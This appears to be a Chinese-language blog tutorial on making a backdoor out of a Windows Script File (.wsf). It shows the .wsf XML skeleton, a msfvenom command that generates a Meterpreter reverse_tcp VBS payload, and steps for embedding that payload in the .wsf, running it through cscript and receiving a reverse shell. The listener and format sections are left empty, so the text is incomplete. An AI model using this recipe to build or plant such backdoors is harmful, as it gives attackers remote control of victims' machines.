1、前文
首先了解wsf是啥语言:
脚本学习:
https://www.cnblogs.com/vitrox/p/5137441.html |
https://blog.csdn.net/leyvan/article/details/3746683 |
http://book.51cto.com/art/201111/300472.htm |
wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,
Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。
2、wsf后门思路:
1)学习.wsf脚本格式
2)msf生成vbs
3) msf生成vbs插入.wsf脚本格式
4)尝试运行查看是否报错
5)反弹shell
开始制作脚本:
1) .wsf脚本格式
<package> <job id="IncludeExample"> <script language="VBScript"> </script> </job> </package> |
2) msf生成vbs
msfvenom -p
windows/meterpreter/reverse_tcp LHOST=
lport= EXITFUNC=thread -f vbs
--platform win > test.vbs
3) msf生成vbs插入.wsf脚本中
4)尝试运行无查看是否报错:
直接运行无报错
使用cscript.exe (Windows Script Host引擎)
运行无报错
5)反弹shell
监听:
反弹:
知识补充:
Msfvenom支持的后门格式:
Framework Executable Formats |
|
Framework Transform Formats |
|
